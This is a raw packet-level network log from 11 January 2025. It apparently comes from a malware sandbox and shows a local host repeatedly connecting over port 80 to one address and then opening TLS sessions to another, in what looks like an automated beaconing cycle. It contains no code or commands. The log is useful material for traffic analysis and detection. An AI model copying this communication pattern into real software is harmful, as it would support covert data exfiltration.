                                                                                                          Jan 11, 2025 07:31:50.436523914 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.436569929 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.440479994 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.440545082 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.440555096 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.440633059 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.440659046 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.440707922 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.440762997 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.440768957 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.440818071 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.716283083 CET4989280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:31:50.721092939 CET8049892193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.721220970 CET4989280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:31:50.721364021 CET4989280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:31:50.726095915 CET8049892193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:31:52.440203905 CET8049892193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:31:52.449141026 CET4989280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:31:52.454170942 CET8049892193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:31:52.636622906 CET8049892193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:31:52.684099913 CET4989280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:31:53.398179054 CET49913443192.168.2.4104.21.16.1
                                                                                                          Jan 11, 2025 07:31:53.398252964 CET44349913104.21.16.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:53.398343086 CET49913443192.168.2.4104.21.16.1
                                                                                                          Jan 11, 2025 07:31:53.437364101 CET49913443192.168.2.4104.21.16.1
                                                                                                          Jan 11, 2025 07:31:53.437443972 CET44349913104.21.16.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:53.925529003 CET44349913104.21.16.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:53.925640106 CET49913443192.168.2.4104.21.16.1
                                                                                                          Jan 11, 2025 07:31:53.929060936 CET49913443192.168.2.4104.21.16.1
                                                                                                          Jan 11, 2025 07:31:53.929102898 CET44349913104.21.16.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:53.929613113 CET44349913104.21.16.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:53.975589991 CET49913443192.168.2.4104.21.16.1
                                                                                                          Jan 11, 2025 07:31:53.988464117 CET49913443192.168.2.4104.21.16.1
                                                                                                          Jan 11, 2025 07:31:54.031336069 CET44349913104.21.16.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:54.099371910 CET44349913104.21.16.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:54.099440098 CET44349913104.21.16.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:54.099536896 CET49913443192.168.2.4104.21.16.1
                                                                                                          Jan 11, 2025 07:31:54.189364910 CET49913443192.168.2.4104.21.16.1
                                                                                                          Jan 11, 2025 07:32:02.021337986 CET4989280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:02.026165962 CET8049892193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:02.256493092 CET8049892193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:02.309182882 CET4989280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:02.452034950 CET49968443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:02.452085018 CET44349968149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:02.452219009 CET49968443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:02.452766895 CET49968443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:02.452778101 CET44349968149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.067569971 CET44349968149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.067650080 CET49968443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:03.069670916 CET49968443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:03.069681883 CET44349968149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.070067883 CET44349968149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.071482897 CET49968443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:03.115345001 CET44349968149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.115454912 CET49968443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:03.115467072 CET44349968149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.547465086 CET44349968149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.547662973 CET44349968149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.547955036 CET49968443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:03.548290014 CET49968443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:03.709368944 CET4989280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:03.710808992 CET4997880192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:03.714385033 CET8049892193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.714443922 CET4989280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:03.715646982 CET8049978193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:03.715749979 CET4997880192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:03.716248989 CET4997880192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:03.720988035 CET8049978193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:04.342973948 CET8049978193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:04.345633984 CET49983443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:04.345689058 CET44349983149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:04.345762014 CET49983443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:04.346467972 CET49983443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:04.346492052 CET44349983149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:04.387334108 CET4997880192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:04.965477943 CET44349983149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:04.966996908 CET49983443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:04.967057943 CET44349983149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:04.967134953 CET49983443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:04.967156887 CET44349983149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:05.375880003 CET44349983149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:05.375960112 CET44349983149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:05.376122952 CET49983443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:05.388364077 CET49983443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:05.440812111 CET4997880192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:05.442456007 CET4999180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:05.445938110 CET8049978193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:05.445997000 CET4997880192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:05.447272062 CET8049991193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:05.447446108 CET4999180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:05.447618008 CET4999180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:05.452357054 CET8049991193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:06.082190990 CET8049991193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:06.084702969 CET4999180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:06.088251114 CET49996443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:06.088279009 CET44349996149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:06.088666916 CET49996443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:06.088666916 CET49996443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:06.088695049 CET44349996149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:06.089651108 CET8049991193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:06.089714050 CET4999180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:06.707727909 CET44349996149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:06.709460974 CET49996443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:06.709480047 CET44349996149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:06.709718943 CET49996443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:06.709723949 CET44349996149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:07.002765894 CET44349996149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:07.002862930 CET44349996149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:07.003339052 CET49996443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:07.004268885 CET49996443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:07.008994102 CET5000380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:07.013878107 CET8050003193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:07.016376972 CET5000380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:07.016571045 CET5000380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:07.021375895 CET8050003193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:07.642252922 CET8050003193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:07.643531084 CET50007443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:07.643548012 CET44350007149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:07.643887997 CET50007443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:07.643887997 CET50007443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:07.643908024 CET44350007149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:07.684185982 CET5000380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:08.247895956 CET44350007149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:08.249901056 CET50007443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:08.249911070 CET44350007149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:08.249963999 CET50007443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:08.249970913 CET44350007149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:08.524871111 CET44350007149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:08.524947882 CET44350007149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:08.525183916 CET50007443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:08.525464058 CET50007443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:08.529057026 CET5000380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:08.530261040 CET5001280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:08.534027100 CET8050003193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:08.534097910 CET5000380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:08.535027981 CET8050012193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:08.535106897 CET5001280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:08.535211086 CET5001280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:08.540033102 CET8050012193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:10.405659914 CET8050012193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:10.407286882 CET50016443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:10.407356024 CET44350016149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:10.407435894 CET50016443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:10.407783985 CET50016443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:10.407804012 CET44350016149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:10.449985027 CET5001280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:11.031841993 CET44350016149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:11.033807039 CET50016443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:11.033828974 CET44350016149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:11.033974886 CET50016443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:11.033981085 CET44350016149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:11.383148909 CET44350016149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:11.383234978 CET44350016149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:11.383466005 CET50016443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:11.384020090 CET50016443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:11.387867928 CET5001280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:11.389174938 CET5001780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:11.392888069 CET8050012193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:11.392978907 CET5001280192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:11.394047022 CET8050017193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:11.394130945 CET5001780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:11.394243956 CET5001780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:11.399104118 CET8050017193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.024065971 CET8050017193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.025650024 CET50018443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:12.025701046 CET44350018149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.025790930 CET50018443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:12.026223898 CET50018443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:12.026237965 CET44350018149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.075054884 CET5001780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:12.630654097 CET44350018149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.632333040 CET50018443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:12.632361889 CET44350018149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.632427931 CET50018443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:12.632436037 CET44350018149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.919984102 CET44350018149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.920066118 CET44350018149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.920232058 CET50018443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:12.920696974 CET50018443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:12.923980951 CET5001780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:12.925143957 CET5001980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:12.929760933 CET8050017193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.929845095 CET5001780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:12.930627108 CET8050019193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:12.930710077 CET5001980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:12.930804014 CET5001980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:12.936537027 CET8050019193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:15.351646900 CET8050019193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:15.353002071 CET50020443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:15.353044987 CET44350020149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:15.353118896 CET50020443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:15.353467941 CET50020443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:15.353478909 CET44350020149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:15.402988911 CET5001980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:15.959719896 CET44350020149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:15.961769104 CET50020443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:15.961790085 CET44350020149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:15.961843014 CET50020443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:15.961849928 CET44350020149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:16.351779938 CET44350020149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:16.351864100 CET44350020149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:16.351917028 CET50020443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:16.352346897 CET50020443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:16.355803967 CET5001980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:16.357058048 CET5002180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:16.361881018 CET8050019193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:16.361896992 CET8050021193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:16.361953974 CET5001980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:16.361993074 CET5002180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:16.362076998 CET5002180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:16.366801023 CET8050021193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.080642939 CET8050021193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.082160950 CET50022443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:17.082207918 CET44350022149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.082279921 CET50022443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:17.082617998 CET50022443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:17.082627058 CET44350022149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.121737003 CET5002180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:17.694645882 CET44350022149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.696610928 CET50022443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:17.696641922 CET44350022149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.696715117 CET50022443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:17.696722984 CET44350022149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.916883945 CET44350022149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.916958094 CET44350022149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.917144060 CET50022443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:17.917773008 CET50022443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:17.921134949 CET5002180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:17.922359943 CET5002380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:17.926340103 CET8050021193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.926433086 CET5002180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:17.927247047 CET8050023193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:17.927350044 CET5002380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:17.927453995 CET5002380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:17.932291031 CET8050023193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:20.382468939 CET8050023193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:20.384061098 CET50024443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:20.384120941 CET44350024149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:20.384197950 CET50024443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:20.384545088 CET50024443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:20.384567022 CET44350024149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:20.434408903 CET5002380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:20.992873907 CET44350024149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:20.994704008 CET50024443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:20.994775057 CET44350024149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:20.994856119 CET50024443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:20.994880915 CET44350024149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:21.217087984 CET44350024149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:21.217168093 CET44350024149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:21.217225075 CET50024443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:21.217767000 CET50024443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:21.220927954 CET5002380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:21.221966982 CET5002580192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:21.225860119 CET8050023193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:21.225934982 CET5002380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:21.226809025 CET8050025193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:21.226885080 CET5002580192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:21.226994991 CET5002580192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:21.231781006 CET8050025193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:23.261779070 CET8050025193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:23.263534069 CET50026443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:23.263586998 CET44350026149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:23.263668060 CET50026443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:23.264039993 CET50026443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:23.264050007 CET44350026149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:23.309338093 CET5002580192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:23.888890982 CET44350026149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:23.891207933 CET50026443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:23.891242027 CET44350026149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:23.891304016 CET50026443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:23.891310930 CET44350026149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:24.193463087 CET44350026149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:24.193538904 CET44350026149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:24.193627119 CET50026443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:24.194386005 CET50026443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:24.197644949 CET5002580192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:24.198990107 CET5002780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:24.202584028 CET8050025193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:24.202675104 CET5002580192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:24.204303980 CET8050027193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:24.204392910 CET5002780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:24.204605103 CET5002780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:24.209333897 CET8050027193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:26.059494972 CET8050027193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:26.061218023 CET50028443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:26.061285973 CET44350028149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:26.061404943 CET50028443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:26.061815977 CET50028443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:26.061851025 CET44350028149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:26.106314898 CET5002780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:26.667332888 CET44350028149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:26.669328928 CET50028443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:26.669406891 CET44350028149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:26.669492006 CET50028443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:26.669507027 CET44350028149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:27.018300056 CET44350028149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:27.018476009 CET44350028149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:27.018560886 CET50028443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:27.018974066 CET50028443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:27.022820950 CET5002780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:27.023886919 CET5002980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:27.028770924 CET8050027193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:27.028862953 CET5002780192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:27.029578924 CET8050029193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:27.029675961 CET5002980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:27.029798031 CET5002980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:27.035805941 CET8050029193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:28.210283995 CET8050029193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:28.214818001 CET50030443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:28.214931011 CET44350030149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:28.215146065 CET50030443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:28.215442896 CET50030443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:28.215485096 CET44350030149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:28.262521029 CET5002980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:28.841892004 CET44350030149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:28.843874931 CET50030443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:28.843914032 CET44350030149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:28.843964100 CET50030443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:28.843975067 CET44350030149.154.167.220192.168.2.4
